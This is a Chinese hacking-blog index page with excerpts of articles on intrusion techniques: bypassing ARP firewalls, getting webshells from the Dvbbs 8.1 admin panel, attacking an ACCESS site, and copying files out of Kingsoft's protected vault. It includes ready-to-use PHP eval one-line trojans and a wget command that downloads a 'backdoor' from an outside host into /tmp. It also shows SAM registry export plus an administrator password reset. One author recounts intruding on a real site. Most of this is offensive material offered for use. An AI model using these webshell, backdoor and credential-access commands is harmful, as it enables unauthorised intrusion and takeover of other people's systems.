分类 ‘技术文章’ 下的日志

分析一个号称可以过任何arp防火墙的测试软件

作者:breach
来源:breach-一个奇妙的名字

Skiller在Ph4nt0m | Google 网上论坛发布了一个号称可以过任何arp防火墙的测试软件。
http://groups.google.com/group/ph4nt0m/browse_thread/thread/62ef34de7d39d14b
软件说明:
首先这是一个演示版本,与完全版本的唯一不同是不具备流量探测功能,因为网络中如果存在多个这样东西造成网络混乱是难免的,所以在发行上会做一些限制。
无arp的sniffer
可在有arp防火墙,双向绑定环境下有效控制对方流量
完全隐藏,过任何arp防火墙。
需要.net支持,管理员权限运行。
不支持无线网卡
使用方法:
设置网卡,ip,攻击强度
阅读全文 »

Tags: ,

动网8.1后台获取Webshell的详细方法

作者:hackest [H.S.T]

此文章已发表在《黑客X档案》2008年第2期杂志上
后经作者发布在博客上,如转载请务必保留此信息!
文章难易度:★★★
文章阅读点:动网8.1后台获取Webshell的详细方法
话说这期公布了一个动网8.1的最新注入漏洞,利用该漏洞可以轻松得到管理员密码的MD5值,进而查询密码明文进入后台。不过至于进了后台怎么拿 Webshell就没有介绍,本文将详细讲述动网8.1论坛后台获取Webshell的方法。动网虽然一直“洞”不断,不过8.1版本明显在后台安全方面比以前的版本加强了一些,甚至让不少朋友觉得“动网8.1终结了后台获取Webshell的可能”。其实不然,8.1后台一样可以得到Webshell,不过和8.0的有点不同。
一、后台备份
阅读全文 »

Tags: ,

关闭XP保护。替换explorer.exe

作者:open
来源:open's blog

在偶的VPC上测试是可以的。没有更多的测试.
偶并没有调用dllcache目录下的.你喜欢吧
阅读全文 »

对于ACCESS跨库的一些研究

转载请保留版权标记,谢谢
——————————-by 大蝉@http://blog.gsnsg.com/weblog/usual/ QQ:271607603——————————————

今天入侵了一个ACCESS的站,思考了一些问题,记性不好,怕忘了,记录一下:

这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在config.asp里,没FSO根本改不了,Faint…..

我只能围绕这个唯一的注入点展开思考,如果是SQL那该多好,如果是SA权限那该多好,艾, YY是没用的,我还是被ACCESS少得可怜的功能阻挡住了
阅读全文 »

Tags: ,

一行代码都不写,穿透金山安全岛

作者:MJ0011
来源:MJ0011的内核驱动研究所

金山文件安全岛会把要保护的文件COPY到My Document\金山安全岛\文档

当要访问这个目录的文件时,就会提示拒绝

穿透方法,直接运行cmd.exe(我的My Document目录在D盘根目录下)

>d:

d:\>cd MYDOCU~1

d:\>MYDOCU~1\>copy 金山安全岛\文档\被保护文件.xxx e:\xxxxx.xxx

可成功COPY

Tags:

LINUX下写入一句话木马的方法整理

文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。

LINUX下写入一句话木马的方法整理:
(1)echo '<?eval($cmd);?>' > /home/web/www/PREFIX/htdocs/mu.php
(2)echo "<?fputs(fopen('1.php','w+'),'<?eval($_POST[c]);?>');?>" >test11.php
(3)"system('wget http://xxxxxx.com/backdoor -P /tmp')"
阅读全文 »

Tags:

导出管理员密码文件

来源:红狼

sa默认可以读sam键.应该。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用administrator登陆.
用完机器后
reg import c:\test.reg
根本不用克隆.
找到对应的sid.

Tags:

枚举注册表搜索病毒痕迹的实现思路

作者:灰狐
来源:灰狐's Blog

注:本文已发表在<黑客防线>2008年第1期,转载请注明出处.

在第11期的《黑客防线》中,我那篇关于algsrvs病毒专杀的文章中有点不太完美的地方,就是没有把清理注册表那一部分写完整,一个原因就是我在那里说的因为当时我已经把病毒清理干净了,没有记录下每一个相应键值的位置;还有一个原因就是就算我记录下来了,也是一件相当麻烦的事情,因为病毒在注册表中写入的信息相当地多,大概有几十处,这样一个一个删还不把人累死?

当然也不是没有办法,我今天就用一种比较简单的思路来进行演示:首先完整枚举所有项,检查其键值是否被病毒修改过,然后进入子项中递归调用此函数完成遍历注册表的功能。

为了程序的通用性,今天我就不用VCL库中的Registry类了,改用Windo 阅读全文 »

Tags: ,